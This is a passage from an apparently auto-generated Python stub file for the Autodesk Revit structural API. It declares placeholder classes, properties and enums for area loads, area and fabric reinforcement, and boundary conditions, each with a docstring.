self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the 2nd reference point of the area load, oriented according to OrientTo setting. Get: ForceVector2(self: AreaLoad) -> XYZ Set: ForceVector2(self: AreaLoad) = value """ ForceVector3 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the 3rd reference point of the area load, oriented according to OrientTo setting. Get: ForceVector3(self: AreaLoad) -> XYZ Set: ForceVector3(self: AreaLoad) = value """ IsProjected = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the load is projected. Get: IsProjected(self: AreaLoad) -> bool Set: IsProjected(self: AreaLoad) = value """ NumRefPoints = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the total number of reference points for the area load. Get: NumRefPoints(self: AreaLoad) -> int """ class LoadTypeBase(ElementType, IDisposable): """ An object that represents a Load type. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class AreaLoadType(LoadTypeBase, IDisposable): """ An object that represents a Load type. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class AreaReinforcement(Element, IDisposable): """ An object that represents an Area Reinforcement within the Autodesk Revit project. """ @staticmethod def Create(document, hostElement, *__args): """ Create(document: Document, hostElement: Element, curveArray: IList[Curve], majorDirection: XYZ, areaReinforcementTypeId: ElementId, rebarBarTypeId: ElementId, rebarHookTypeId: ElementId) -> AreaReinforcement Create(document: Document, hostElement: Element, majorDirection: XYZ, areaReinforcementTypeId: ElementId, rebarBarTypeId: ElementId, rebarHookTypeId: ElementId) -> AreaReinforcement Creates a new AreaReinforcement object based on a host boundary. document: The document. hostElement: The element that will host the AreaReinforcement. The host can be a Structural Floor, Structural Wall, Structural Slab, or a Part created from a structural layer belonging to one of those element types. majorDirection: A vector to define the major direction of the AreaReinforcement. areaReinforcementTypeId: The id of the AreaReinforcementType. rebarBarTypeId: The id of the RebarBarType. rebarHookTypeId: The id of the RebarHookType. If this parameter is InvalidElementId, it means to create a rebar with no hooks. Returns: The newly created AreaReinforcement. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetBoundaryCurveIds(self): """ GetBoundaryCurveIds(self: AreaReinforcement) -> IList[ElementId] Retrieves the set of curves forming the boundary of the Area Reinforcement. Returns: A collection of ElementIds of AreaReinforcementCurve elements. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetHostId(self): """ GetHostId(self: AreaReinforcement) -> ElementId The element that contains the Area Reinforcement. Returns: The element that the Area Reinforcement object belongs to, such as a structural wall, floor or foundation. """ pass def GetRebarInSystemIds(self): """ GetRebarInSystemIds(self: AreaReinforcement) -> IList[ElementId] Returns the ids of the RebarInSystem elements owned by the AreaReinforcement element. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: AreaReinforcement, view: View3D) -> bool Checks if this Area Reinforcement is shown solidly in a 3D view. view: The 3D view element Returns: True if Area Reinforcement is shown solidly, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: AreaReinforcement, view: View) -> bool Checks if Area Reinforcement is shown unobscured in a view. view: The view element Returns: True if Area Reinforcement is shown unobscured, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass @staticmethod def RemoveAreaReinforcementSystem(doc, system): """ RemoveAreaReinforcementSystem(doc: Document, system: AreaReinforcement) -> IList[ElementId] Deletes the specified AreaReinforcement, and converts its RebarInSystem elements to equivalent Rebar elements. doc: The document. system: An AreaReinforcement element in the document. Returns: The ids of the newly created Rebar elements. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: AreaReinforcement, view: View3D, solid: bool) Sets this Area Reinforcement to be shown solidly in a 3D view. view: The 3D view element solid: True if Area Reinforcement is shown solidly, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: AreaReinforcement, view: View, unobscured: bool) Sets Area Reinforcement to be shown unobscured in a view. view: The view element unobscured: True if Area Reinforcement is shown unobscured, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AdditionalBottomCoverOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Additional offset from the bottom or interior cover reference. Get: AdditionalBottomCoverOffset(self: AreaReinforcement) -> float Set: AdditionalBottomCoverOffset(self: AreaReinforcement) = value """ AdditionalTopCoverOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Additional offset from the top or exterior cover reference. Get: AdditionalTopCoverOffset(self: AreaReinforcement) -> float Set: AdditionalTopCoverOffset(self: AreaReinforcement) = value """ AreaReinforcementType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieves the type of the Area Reinforcement. Get: AreaReinforcementType(self: AreaReinforcement) -> AreaReinforcementType """ Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieve the Major Direction of the Area Reinforcement. Get: Direction(self: AreaReinforcement) -> XYZ """ class AreaReinforcementCurve(CurveElement, IDisposable): """ An object that specifies the type of a floor in Autodesk Revit. """ def Dispose(self): """ Dispose(self: AreaReinforcementCurve, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass Curve = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the 3D curve forming part of the boundary of an Area Reinforcement element. Get: Curve(self: AreaReinforcementCurve) -> Curve """ class AreaReinforcementType(ElementType, IDisposable): """ An object that specifies the type of a Structural Area Reinforcement element in Autodesk Revit. """ @staticmethod def CreateDefaultAreaReinforcementType(aDoc): """ CreateDefaultAreaReinforcementType(aDoc: Document) -> ElementId Creates a new AreaReinforcementType object with a default name. aDoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class BentFabricBendDirection(Enum, IComparable, IFormattable, IConvertible): """ Direction in which FabricSheet is bent. enum BentFabricBendDirection, values: Major (0), Minor (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Major = None Minor = None value__ = None class BentFabricStraightWiresLocation(Enum, IComparable, IFormattable, IConvertible): """ Bent Fabric straight wires location. The side on wich straight wires will be loacted is determined by the start and end point of the first bent profile segment that specifies the direction of the curve loop on plane. enum BentFabricStraightWiresLocation, values: Left (1), Right (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Left = None Right = None value__ = None class BentFabricWiresOrientation(Enum, IComparable, IFormattable, IConvertible): """ Bent Fabric wires orientation. enum BentFabricWiresOrientation, values: Down (0), Up (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Down = None Up = None value__ = None class BoundaryConditions(Element, IDisposable): """ An object that represents a force applied across an area. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetBoundaryConditionsType(self): """ GetBoundaryConditionsType(self: BoundaryConditions) -> BoundaryConditionsType Returns the boundary conditions type. Returns: The boundary conditions type. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurve(self): """ GetCurve(self: BoundaryConditions) -> Curve Returns curve that define geometry of the line boundary conditions. """ pass def GetDegreesOfFreedomCoordinateSystem(self): """ GetDegreesOfFreedomCoordinateSystem(self: BoundaryConditions) -> Transform Gets the origin and rotation of coordinate system that is used by translation and rotation parameters, like X Translation or Z Rotation. Returns: The coordinate system. Origin contains the position of the start of the boundary conditions. BasisX, BasisY and BasisZ contain the directions of the axes in the global coordinate system. """ pass def GetLoops(self): """ GetLoops(self: BoundaryConditions) -> IList[CurveLoop] Returns curve loops that define geometry of the area boundary conditions. Returns: The curve loop collection. """ pass def GetOrientTo(self): """ GetOrientTo(self: BoundaryConditions) -> BoundaryConditionsOrientTo Returns the boundary conditions orientation option. Returns: The orientation option. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetOrientTo(self, orientTo): """ SetOrientTo(self: BoundaryConditions, orientTo: BoundaryConditionsOrientTo) Sets the boundary condition orientation option. orientTo: The new orientation option. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AssociatedLoadId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Id of the internal load element associated with a boundary conditions. Get: AssociatedLoadId(self: BoundaryConditions) -> ElementId Set: AssociatedLoadId(self: BoundaryConditions) = value """ HostElement = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host element for the boundary conditions. Get: HostElement(self: BoundaryConditions) -> AnalyticalModel """ HostElementId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host element Id for the boundary conditions. Get: HostElementId(self: BoundaryConditions) -> ElementId """ Point = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the position of point boundary conditions. Get: Point(self: BoundaryConditions) -> XYZ """ class BoundaryConditionsOrientTo(Enum, IComparable, IFormattable, IConvertible): """ Specifies boundary condition orientation. enum BoundaryConditionsOrientTo, values: HostLocalCoordinateSystem (1), Project (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass HostLocalCoordinateSystem = None Project = None value__ = None class BoundaryConditionsType(Enum, IComparable, IFormattable, IConvertible): """ This enum declares type of BoundaryConditions. enum BoundaryConditionsType, values: Area (2), Line (1), Point (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Area = None Line = None Point = None value__ = None class BracePlanRepresentation(Enum, IComparable, IFormattable, IConvertible): """ The possible representations for braces in plan views. enum BracePlanRepresentation, values: LineWithAngle (2), ParallelLine (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass LineWithAngle = None ParallelLine = None value__ = None class CodeCheckingParameterServiceData(object, IDisposable): """ The data needed by code checking server to perform code checking. """ def Dispose(self): """ Dispose(self: CodeCheckingParameterServiceData) """ pass def GetCurrentElements(self): """ GetCurrentElements(self: CodeCheckingParameterServiceData) -> IList[ElementId] Returns the list of Ids of the current elements. Returns: Ids of the current elements. Contains the analytical model element to which the code checking parameter belongs. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: CodeCheckingParameterServiceData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Document = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The current document. Get: Document(self: CodeCheckingParameterServiceData) -> Document """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: CodeCheckingParameterServiceData) -> bool """ class DistributionType(Enum, IComparable, IFormattable, IConvertible): """ The type of the distribution enum DistributionType, values: Uniform (0), VaryingLength (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Uniform = None value__ = None VaryingLength = None class EndTreatmentType(ElementType, IDisposable): """ An end treatment type object that is used to hold information about the end treatment applied to bars that are connected to a coupler. """ @staticmethod def Create(doc, strTreatment=None): """ Create(doc: Document) -> EndTreatmentType Creates a new EndTreatmentType in a document. Create(doc: Document, strTreatment: str) -> EndTreatmentType Creates a new EndTreatmentType in a document and adds the input string to the endTreatment parameter. """ pass @staticmethod def CreateDefaultEndTreatmentType(ADoc): """ CreateDefaultEndTreatmentType(ADoc: Document) -> ElementId Creates a new EndTreatmentType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass EndTreatment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """String describing the end treatment Get: EndTreatment(self: EndTreatmentType) -> str Set: EndTreatment(self: EndTreatmentType) = value """ class FabricArea(Element, IDisposable): """ An object that represents an Fabric Area Distribution within the Autodesk Revit project. It is container for Fabric Sheet elements. """ def CopyCurveLoopsInSketch(self): """ CopyCurveLoopsInSketch(self: FabricArea) -> IList[CurveLoop] Creates copies of the CurveLoops in the FabricArea sketch. Returns: The copy of the curve loops. """ pass @staticmethod def Create(aDoc, hostElement, *__args): """ Create(aDoc: Document, hostElement: Element, curveLoops: IList[CurveLoop], majorDirection: XYZ, majorDirectionOrigin: XYZ, fabricAreaTypeId: ElementId, fabricSheetTypeId: ElementId) -> FabricArea Create(aDoc: Document, hostElement: Element, majorDirection: XYZ, fabricAreaTypeId: ElementId, fabricSheetTypeId: ElementId) -> FabricArea Creates a FabricArea based on a host boundary. aDoc: The document. hostElement: The element that will host the FabricArea. The host can be a Structural Floor, Structural Wall, Structural Slab, or a Part created from a structural layer belonging to one of those element types. majorDirection: A vector to define the major direction of the FabricArea. fabricAreaTypeId: The id of the FabricAreaType. fabricSheetTypeId: The id of the FabricSheetType. Returns: The newly created FabricArea. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetBoundaryCurveIds(self): """ GetBoundaryCurveIds(self: FabricArea) -> IList[ElementId] Retrieves the identifiers of the set of curves forming the boundary of the Fabric Area. Returns: A collection of ElementIds of FabricAreaCurve elements. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetFabricSheetElementIds(self): """ GetFabricSheetElementIds(self: FabricArea) -> IList[ElementId] Retrieves the identifiers of all the FabricSheet Elements in the FabricArea. Returns: A collection of ElementIds of FabricSheet elements. """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: FabricArea) -> FabricRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def GetTotalSheetMass(self): """ GetTotalSheetMass(self: FabricArea) -> float Calculates the total sheet mass: Volume of Wire * Unit Weight. Returns: The total sheet mass. """ pass def GetValidViewsForTags(self): """ GetValidViewsForTags(self: FabricArea) -> IList[ElementId] Gets ids of the views where tags and symbols can be placed for the FabricArea and/or FabricSheets Returns: The collection of View ElementIds. """ pass def IsCoverOffsetValid(self, coverOffset): """ IsCoverOffsetValid(self: FabricArea, coverOffset: float) -> bool Identifies if the specified value is valid for use as a cover offset. coverOffset: The cover offset value. Returns: True if the value is valid, false if the value is invalid. """ pass def IsValidMajorLapSplice(self, majorLapSplice): """ IsValidMajorLapSplice(self: FabricArea, majorLapSplice: float) -> bool Identifies if the specified value is valid for use as a major lap splice. majorLapSplice: The major lap splice value. Returns: True if the value is valid, false if the value is invalid. """ pass def IsValidMinorLapSplice(self, minorLapSplice): """ IsValidMinorLapSplice(self: FabricArea, minorLapSplice: float) -> bool Identifies if the specified value is valid for use as a minor lap splice. minorLapSplice: The minor lap splice value. Returns: True if the value is valid, false if the value is invalid. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass @staticmethod def RemoveFabricReinforcementSystem(doc, system): """ RemoveFabricReinforcementSystem(doc: Document, system: FabricArea) -> IList[ElementId] Deletes the specified FabricArea, and converts its FabricSheet elements to equivalent Single Fabric Sheet elements. doc: The document. system: An FabricArea Reinforcement element in the document. Returns: The ids of the newly created Single Fabric Sheet elements. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass CoverOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The additional cover offset of the fabric distribution. Get: CoverOffset(self: FabricArea) -> float Set: CoverOffset(self: FabricArea) = value """ Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Major Direction of the Fabric Area. Get: Direction(self: FabricArea) -> XYZ """ DirectionOrigin = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Origin Point of the Major Direction of the Fabric Area. Get: DirectionOrigin(self: FabricArea) -> XYZ """ FabricAreaType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The type of the Fabric Area. Get: FabricAreaType(self: FabricArea) -> FabricAreaType """ FabricLocation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Fabric location in the host. Get: FabricLocation(self: FabricArea) -> FabricLocation Set: FabricLocation(self: FabricArea) = value """ FabricSheetTypeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Fabric Sheet Type for this element. Get: FabricSheetTypeId(self: FabricArea) -> ElementId Set: FabricSheetTypeId(self: FabricArea) = value """ HostId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Host element for the fabric area. Get: HostId(self: FabricArea) -> ElementId """ LapSplicePosition = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric lap splice position in the fabric distribution. Get: LapSplicePosition(self: FabricArea) -> FabricLapSplicePosition Set: LapSplicePosition(self: FabricArea) = value """ MajorLapSpliceLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric lap splice length in the fabric distribution in the major direction. Get: MajorLapSpliceLength(self: FabricArea) -> float Set: MajorLapSpliceLength(self: FabricArea) = value """ MajorSheetAlignment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric sheet alignment in the fabric distribution in the major direction. Get: MajorSheetAlignment(self: FabricArea) -> FabricSheetAlignment Set: MajorSheetAlignment(self: FabricArea) = value """ MinorLapSpliceLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric lap splice length in the fabric distribution in the minor direction. Get: MinorLapSpliceLength(self: FabricArea) -> float Set: MinorLapSpliceLength(self: FabricArea) = value """ MinorSheetAlignment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric sheet alignment in the fabric distribution in the minor direction. Get: MinorSheetAlignment(self: FabricArea) -> FabricSheetAlignment Set: MinorSheetAlignment(self: FabricArea) = value """ SketchId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Sketch element for this element. Get: SketchId(self: FabricArea) -> ElementId """ TagViewId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The element of the view in which to tag new members of this element. Get: TagViewId(self: FabricArea) -> ElementId Set: TagViewId(self: FabricArea) = value """ class FabricAreaType(ElementType, IDisposable): """ A FabricAreaType object is used in FabricArea object generation. """ @staticmethod def CreateDefaultFabricAreaType(aDoc): """ CreateDefaultFabricAreaType(aDoc: Document) -> ElementId Creates a new FabricAreaType object with a default name. aDoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class FabricHostReference(Enum, IComparable, IFormattable, IConvertible): """ Controls if Single Fabric Sheet should be cut by the Host Cover. enum FabricHostReference, values: CutByCover (1), NotCutByCover (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y 